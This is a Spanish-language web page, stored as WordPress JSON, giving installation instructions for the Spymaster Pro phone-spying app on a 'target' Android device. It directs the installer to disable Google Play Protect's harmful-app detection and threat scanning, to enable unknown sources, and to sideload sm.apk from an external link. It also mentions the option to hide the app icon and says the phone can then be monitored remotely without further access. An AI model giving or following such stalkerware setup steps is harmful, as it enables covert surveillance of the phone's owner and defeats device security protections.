{"id":132,"date":"2014-05-06T06:13:55","date_gmt":"2014-05-06T06:13:55","guid":{"rendered":"https:\/\/www.spymasterpro.com\/es\/?page_id=132"},"modified":"2023-03-09T10:40:57","modified_gmt":"2023-03-09T10:40:57","slug":"instalacion-android","status":"publish","type":"page","link":"https:\/\/www.spymasterpro.com\/es\/instalacion-android\/","title":{"rendered":"Instalaci\u00f3n Android"},"content":{"rendered":"<div id=\"pl-132\"  class=\"panel-layout\" ><div id=\"pg-132-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-132-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-132-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">Spymaster Pro Android Installation Guide<\/h3>\t\t\t<div class=\"textwidget\"><section id=\"android_bottom\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<h2>SpymasterPro Gu\u00eda de instalaci\u00f3n de Android <\/h2>\r\n<div class=\"android_text\">\r\n<p>Bienvenido a la gu\u00eda de instalaci\u00f3n Spymaster Pro\u2019s para Android. Asumimos que ha recibido el correo electr\u00f3nico de bienvenida en su cuenta y que su compra ha sido confirmada. Si tiene acceso directo al tel\u00e9fono Android que desea supervisar, guarde el correo electr\u00f3nico, ya que contiene los detalles importantes para de instalar el software.<\/p>\r\n<\/div>\r\n<div class=\"note\">\r\n<p><strong>Nota: Esta instalaci\u00f3n es aplicable s\u00f3lo despu\u00e9s de comprar el software.<\/strong><\/p>\r\n<\/div>\r\n<div class=\"android_installation\">\r\n<h3>Gu\u00eda de Instalaci\u00f3n Android<\/h3>\r\n<div class=\"android_text\">\r\n<p>Para instalar Spymaster Pro en el tel\u00e9fono Android, siga la siguiente gu\u00eda de instalaci\u00f3n:<\/p>\r\n<p><strong>Nota: Vaya a Configuraci\u00f3n> Google> Seguridad> Protecci\u00f3n de Google Play.<\/strong> <br> <strong>Deshabilite Mejorar la detecci\u00f3n de aplicaciones da\u00f1inas y Escanear dispositivos para detectar amenazas de seguridad.<\/strong><\/p>\r\n<\/div>\r\n<div class=\"row\">\r\n<div class=\"col-xl-8 col-lg-8 col-md-8 android_steps text-xs-center\">\r\n<h5>Paso 1<\/h5>\r\n<p>Desde el tel\u00e9fono m\u00f3vil vaya a la opci\u00f3n \u201cAjustes\u201d. Luego desde el men\u00fa vaya a la opci\u00f3n \u201cSeguridad\u201d, y haga clic en \u201cUnknown sources\u201d. No olvide activar la opci\u00f3n \u201cDispositivos Desconocidos\u201d como se muestra a continuaci\u00f3n, de los contario el software no se instalar\u00e1 correctamente.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step1.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step1.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 2<\/h5>\r\n<p>Ahora abra el explorador desde el tel\u00e9fono Android deseado y entre en y haga clic en Go.<\/p>\r\n<p><a href=\"http:\/\/imobispy.com\/android\/spy\/sm.apk\" rel=\"nofollow\" class=\"dark-btn\">Descargar ahora<\/a><\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step2.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step2.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 3<\/h5>\r\n<p>La aplicaci\u00f3n comenzar\u00e1 a descargarse. Puede revisar el progreso de la descarga en la barra de notificaci\u00f3n del tel\u00e9fono Android deseado.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step3.jpg\"> <img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step3.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 4<\/h5>\r\n<p>Una vez la descarga haya finalizado. Haga clic en sm.apk, tirando hacia abajo en la barra de notificaci\u00f3n del dispositivo<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step4.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step4.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 5<\/h5>\r\n<p>Despu\u00e9s vera la petici\u00f3n de permiso del sistema haga clic en \u201cSiguiente\u201d.<\/p>\r\n<br>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step5.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step5.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 6<\/h5>\r\n<p>Ver\u00e1 otra petici\u00f3n de permiso de sistema m\u00e1s, haga clic en \u201cSiguiente\u201d.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step6.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step6.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 7<\/h5>\r\n<p>Despu\u00e9s haga clic en \u201cInstalar\u201d, y comenzar\u00e1 el proceso de instalaci\u00f3n.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step7.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step7.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 8<\/h5>\r\n<p>Esperar a que Spymaster Pro este instalado.<\/p>\r\n<br>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step8.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step8.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 9<\/h5>\r\n<p>Dar a \u201cAbrir\u201d una vez instalado el software.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step9.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step9.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 10<\/h5>\r\n<p>Hacer clic en \u201cContinuar\u201d para completar la instalaci\u00f3n.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step10.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step10.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 11<\/h5>\r\n<p>Aceptar los T\u00e9rminos y Condiciones de uso del software.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step11.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step11.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 12<\/h5>\r\n<p>Ahora se mostrar\u00e1n dos opciones. Mostar u ocultar el icono, pero esto es in\u00fatil. No lo necesita.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step12.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step12.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 13<\/h5>\r\n<p>Despu\u00e9s ingrese el c\u00f3digo de registro suministrado en su panel de control.<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step13.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step13.jpg\"><\/a>\r\n<\/div>\r\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\r\n<h5>Paso 14<\/h5>\r\n<p>Haga clic en \u201cActivar\u201d para permitir al System Task realizar ciertas operaciones<\/p>\r\n<a href=\"..\/wp-content\/uploads\/2017\/02\/step14.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step14.jpg\"><\/a>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/section>\r\n\r\n<section id=\"installation_faq\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p>Desde el men\u00fa del tel\u00e9fono m\u00f3vil, vaya a opciones &#8220;Configuraci\u00f3n&#8221;. A continuaci\u00f3n, en el men\u00fa, vaya a la opci\u00f3n &#8220;Seguridad&#8221; y haga clic en &#8220;Fuentes desconocidas&#8221;. No olvide activar la opci\u00f3n &#8220;Fuentes desconocidas&#8221; como se muestra a continuaci\u00f3n, de lo contrario el software no se instalar\u00e1 correctamente.<\/p>\r\n\r\n<p>Una vez finalizada la instalaci\u00f3n, puede abandonar el tel\u00e9fono de destino e iniciar sesi\u00f3n en su cuenta de Spymaster desde cualquier dispositivo. Ahora no hay necesidad de tocar el tel\u00e9fono de destino. Puede ver todo de forma remota.\r\n<\/p>\r\n<p><strong>Link: \u201c <a href=\"https:\/\/www.spymasterpro.com\/main_admin\/login.php\">https:\/\/www.spymasterpro.com\/main_admin\/login.php<\/a>\u201d <\/strong><\/p>\r\n\r\n\r\n<br>\r\n<div class=\"faq_part\">\r\n<h4>FAQ sobre la instalaci\u00f3n en Android<\/h4>\r\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> &nbsp; \u00bfCu\u00e1nto tiempo tomar\u00e1 este proceso de instalaci\u00f3n?<\/strong><\/p>\r\n<p>El software es instalado en el tel\u00e9fono de destino en 5 minutos o menos.<\/p>\r\n<br>\r\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> &nbsp; \u00bfNecesito conectar el tel\u00e9fono Android a un PC durante la instalaci\u00f3n?<\/strong><\/p>\r\n<p>No, no necesita conectar el tel\u00e9fono m\u00f3vil en el PC durante la instalaci\u00f3n.<\/p>\r\n<br>\r\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> &nbsp; \u00bfDepende Spymaster Pro de conexi\u00f3n a internet para pasar informaci\u00f3n?<\/strong><\/p>\r\n<p>Si, Spymaster Pro necesita conexi\u00f3n a internet para pasar informaci\u00f3n hasta el panel de control.<\/p>\r\n<br>\r\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> &nbsp;  Necesita la instalaci\u00f3n de internet?<\/strong><\/p>\r\n<p>El tel\u00e9fono Android necesita internet, de manera que pueda acceder al email y descargar el archivo .apk.<\/p>\r\n<br><i class=\"fa fa-hand-o-right\"><\/i> <strong> &nbsp;   Necesita el proceso de instalaci\u00f3n de Spymaster Pro una SIM?<\/strong><\/p>\r\n<p>No, el \u00fanico requisito durante la instalaci\u00f3n de Spymaster Pro es una conexi\u00f3n a internet.<\/p>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/section>\r\n\r\n<section id=\"installation_btn\">\r\n<div class=\"container\">\r\n<div class=\"text-xs-center col-xs-12\">\r\n<div class=\"d-grid gap-2 d-md-block\">\r\n<a class=\"blue_btn hidden-sm-down\" href=\"https:\/\/www.spymasterpro.com\/es\/seguro-de-usar\/\">Seguro De Usar<\/a> <a class=\"blue_btn hidden-sm-down\" href=\"https:\/\/www.spymasterpro.com\/es\/comprar-ahora\/\">CONSIGALO AQU\u00cd<\/a> <a class=\"blue_btn\" href=\"https:\/\/www.spymasterpro.com\/es\/android-espia\/\">Android Espia<\/a> <a class=\"blue_btn demo_btn hidden-md-up\" href=\"https:\/\/www.spymasterpro.com\/es\/comprar-ahora\/\">CONSIGALO AQU\u00cd<\/a>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/section><\/div>\r\n\t\t<\/div><\/div><\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>Spymaster Pro Android Installation Guide SpymasterPro Gu\u00eda de instalaci\u00f3n de Android Bienvenido a la gu\u00eda de instalaci\u00f3n Spymaster Pro\u2019s para Android. Asumimos que ha recibido el correo electr\u00f3nico de bienvenida en su cuenta y que su compra ha sido confirmada. Si tiene acceso directo al tel\u00e9fono Android que desea supervisar, guarde el correo electr\u00f3nico, ya &hellip; <a href=\"https:\/\/www.spymasterpro.com\/es\/instalacion-android\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Instalaci\u00f3n Android&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"page-full.php","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-132","page","type-page","status-publish","hentry"],"acf":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/pages\/132","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/comments?post=132"}],"version-history":[{"count":3,"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/pages\/132\/revisions"}],"predecessor-version":[{"id":3851,"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/pages\/132\/revisions\/3851"}],"wp:attachment":[{"href":"https:\/\/www.spymasterpro.com\/es\/wp-json\/wp\/v2\/media?parent=132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}